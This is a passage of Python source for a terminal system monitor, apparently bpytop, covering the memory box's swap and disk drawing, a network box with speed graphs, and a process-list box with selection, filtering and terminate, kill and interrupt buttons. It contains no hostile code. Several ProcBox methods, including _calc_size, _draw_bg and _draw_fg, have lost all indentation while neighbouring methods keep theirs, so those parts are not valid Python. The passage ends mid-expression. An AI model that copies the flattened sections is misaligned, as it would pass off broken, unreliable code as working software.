					if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
					cy += 1
				out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
				cy += 1
				for name in cls.swap_names:
					if cy > h - 1: break
					if Collector.collect_interrupt: return
					if cls.mem_size > 2:
						out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
							f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
						cy += 2 if not cls.graph_height else cls.graph_height + 1
					else:
						out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
			if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
			#* Disks
			if CONFIG.show_disks and mem.disks:
				cx = x + cls.mem_width - 1; cy = 0
				big_disk: bool = cls.disks_width >= 25
				gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
				if CONFIG.io_mode:
					#* IO mode: one section per disk with large read/write graphs
					for name in cls.disks_io_order:
						item = mem.disks[name]
						io_item = mem.disks_io_dict.get(name, {})
						if Collector.collect_interrupt: return
						if cy > h - 1: break
						out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
						if big_disk:
							out += Fx.trans(f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(str(item["used_percent"])) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["used_percent"]}%')
						cy += 1
						if io_item:
							if cy > h - 1: break
							if CONFIG.io_graph_combined:
								if cls.disks_io_h <= 1:
									out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}'
								out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
									f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io"] or "RW"}')
								cy += cls.disks_io_h
							else:
								if cls.disks_io_h <= 3:
									out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}{Mv.to(y+cy+1, x+cx-1)}{" " * 5}'
								out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["read"](None if cls.redraw else mem.disks_io_dict[name]["read"][-1])}'
									f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io_r"] or "R"}')
								cy += cls.disks_io_h // 2
								out += f'{Mv.to(y+cy, x+cx-1)}{Graphs.disk_io[name]["write"](None if cls.redraw else mem.disks_io_dict[name]["write"][-1])}'
								cy += cls.disks_io_h // 2
								out += f'{Mv.to(y+cy-1, x+cx-1)}{THEME.main_fg}{item["io_w"] or "W"}'
				else:
					#* Normal mode: used/free meters per disk, optional small IO graph
					for name, item in mem.disks.items():
						if Collector.collect_interrupt: return
						if not name in Meters.disks_used:
							continue
						if cy > h - 1: break
						out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
						if big_disk:
							out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{Fx.trans(item["io"])}'
						cy += 1
						if cy > h - 1: break
						if CONFIG.show_io_stat and name in Graphs.disk_io:
							out += f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{Fx.ub}{" IO: " if big_disk else " IO   " + Mv.l(2)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
							if not big_disk and item["io"]:
								out += f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{THEME.main_fg}{item["io"]}'
							cy += 1
							if cy > h - 1: break
						out += Mv.to(y+cy, x+cx) + (f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U ")
						out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
						cy += 1
						if len(mem.disks) * 3 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1:
							if cy > h - 1: break
							out += Mv.to(y+cy, x+cx)
							out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
							out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
							cy += 1
							if len(mem.disks) * 4 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1: cy += 1
		except (KeyError, TypeError):
			return
		Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
		cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
	"""Box showing download/upload graphs for the selected network interface plus
	a sub-box with current speed, top speed and totals."""
	name = "net"
	num = 3
	height_p = 30
	width_p = 45
	min_w: int = 36
	min_h: int = 6
	x = 1
	y = 1
	resized: bool = True
	redraw: bool = True
	graph_height: Dict[str, int] = {}  # rows for the "download" and "upload" graphs
	symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
	buffer: str = "net"
	Box.buffers.append(buffer)

	@classmethod
	def _calc_size(cls):
		"""Calculate box, sub-box and graph dimensions from the terminal size and active boxes."""
		if not "net" in cls.boxes:
			cls.width = Term.width
			return
		if not "proc" in cls.boxes:
			width_p = 100
		else:
			width_p = cls.width_p
		cls.width = round(Term.width * width_p / 100)
		#* Net box takes whatever vertical space is left below the cpu and mem boxes
		cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
		cls.y = Term.height - cls.height + 1
		cls.box_width = 27 if cls.width > 45 else 19
		cls.box_height = 9 if cls.height > 10 else cls.height - 2
		cls.box_x = cls.width - cls.box_width - 1
		cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
		cls.graph_height["download"] = round((cls.height - 2) / 2)
		cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
		cls.redraw = True

	@classmethod
	def _draw_bg(cls) -> str:
		"""Return the static background: box outline and the stats sub-box."""
		if not "net" in cls.boxes: return ""
		return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'

	@classmethod
	def _draw_fg(cls):
		"""Draw the dynamic content: speed graphs, interface buttons and the stats
		sub-box values, then flush to the draw buffer."""
		if not "net" in cls.boxes: return
		net = NetCollector
		if net.redraw: cls.redraw = True
		if not net.nic: return
		out: str = ""
		out_misc: str = ""
		x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
		bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
		reset: bool = bool(net.stats[net.nic]["download"]["offset"])
		#* Rebuild buttons ([z]ero, <b nic n>, [a]uto, s[y]nc) when size or layout changed
		if cls.resized or cls.redraw:
			out_misc += cls._draw_bg()
			Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
			Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
			Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
			out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
				f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
				f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
			if w - len(net.nic[:10]) - 20 > 6:
				Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
				out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
					f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
			if w - len(net.nic[:10]) - 20 > 13:
				Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
				out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
					f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
			if net.address and w - len(net.nic[:10]) - len(net.address) - 20 > 15:
				out_misc += (f'{Mv.to(y-1, x+7)}{THEME.net_box(Symbol.title_left)}{Fx.b}{THEME.title(net.address)}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
			Draw.buffer("net_misc", out_misc, only_save=True)
		cy = 0
		for direction in ["download", "upload"]:
			strings = net.strings[net.nic][direction]
			stats = net.stats[net.nic][direction]
			if cls.redraw: stats["redraw"] = True
			if stats["redraw"] or cls.resized:
				Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
					invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None, round_up_low=True)
			out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
			#* Sub-box lines: current speed, then "Top" and "Total" when the box is tall enough
			out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
				("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
			cy += 1 if bh != 3 else 2
			if bh >= 6:
				out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
				cy += 1
			if bh >= 4:
				out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
				if bh > 2 and bh % 2: cy += 2
				else: cy += 1
			stats["redraw"] = False
		out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
			f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
		Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
		cls.redraw = cls.resized = False
class ProcBox(Box):
	"""Box showing the process list with selection, scrolling, filtering and an
	optional detailed view for a single process."""
	name = "proc"
	num = 4
	height_p = 68
	width_p = 55
	min_w: int = 44
	min_h: int = 16
	x = 1
	y = 1
	current_y: int = 0       # top of the process list area (shifted down in detailed mode)
	current_h: int = 0       # height of the process list area
	select_max: int = 0      # number of selectable rows that fit in the box
	selected: int = 0        # currently selected row, 0 = nothing selected
	selected_pid: int = 0
	last_selection: int = 0  # remembered selection when moving focus to the detailed view
	filtering: bool = False
	moved: bool = False
	start: int = 1           # index of the first visible process (scroll position)
	count: int = 0
	s_len: int = 0
	detailed: bool = False
	detailed_x: int = 0
	detailed_y: int = 0
	detailed_width: int = 0
	detailed_height: int = 8
	resized: bool = True
	redraw: bool = True
	buffer: str = "proc"
	pid_counter: Dict[int, int] = {}
	Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
	@classmethod
	def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
		"""Update process list selection and scroll position for a navigation key
		or mouse event, clamp the result to valid bounds, and trigger a
		redraw-only collection run if anything changed.

		key: one of "up"/"k", "down"/"j", "mouse_scroll_up"/"mouse_scroll_down",
			"page_up"/"page_down", "home", "end", "mouse_click", "mouse_unselect".
		mouse_pos: terminal (x, y) of the event, used for "mouse_click".
		"""
		old: Tuple[int, int] = (cls.start, cls.selected)
		new_sel: int
		if key in ["up", "k"]:
			if cls.selected == 1 and cls.start > 1:
				cls.start -= 1
			elif cls.selected == 1:
				cls.selected = 0
			elif cls.selected > 1:
				cls.selected -= 1
		elif key in ["down", "j"]:
			#* Moving down from the detailed view restores the remembered selection
			if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
				cls.selected = cls.last_selection
				cls.last_selection = 0
			if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
				cls.start += 1
			elif cls.selected < cls.select_max:
				cls.selected += 1
		elif key == "mouse_scroll_up" and cls.start > 1:
			cls.start -= 5
		elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
			cls.start += 5
		elif key == "page_up" and cls.start > 1:
			cls.start -= cls.select_max
		elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
			cls.start += cls.select_max
		elif key == "home":
			if cls.start > 1: cls.start = 1
			elif cls.selected > 0: cls.selected = 0
		elif key == "end":
			if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
			elif cls.selected < cls.select_max: cls.selected = cls.select_max
		elif key == "mouse_click":
			#* Click near the right edge of the box scrolls via the scrollbar area
			if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
				if mouse_pos[1] == cls.current_y + 2:
					cls.start = 1
				elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
					cls.start = ProcCollector.num_procs - cls.select_max + 1
				else:
					cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
			else:
				#* Click on a row selects it; a second click on the same row acts as "enter"
				new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
				if new_sel > 0 and new_sel == cls.selected:
					Key.list.insert(0, "enter")
					return
				elif new_sel > 0 and new_sel != cls.selected:
					if cls.last_selection: cls.last_selection = 0
					cls.selected = new_sel
		elif key == "mouse_unselect":
			cls.selected = 0
		#* Clamp scroll position and selection to the current process count and box size
		if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
		elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
		if cls.start < 1: cls.start = 1
		if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
		elif cls.selected > cls.select_max: cls.selected = cls.select_max
		if cls.selected < 0: cls.selected = 0
		if old != (cls.start, cls.selected):
			cls.moved = True
			Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "T", "K", "I", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["T"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "K" in Key.mouse: Key.mouse["K"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "I" in Key.mouse: Key.mouse["I"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("F" if cls.filtering and proc.case_sensitive else "f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "T" in Key.mouse: Key.mouse["T"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "K" in Key.mouse: Key.mouse["K"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "I" in Key.mouse: Key.mouse["I"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
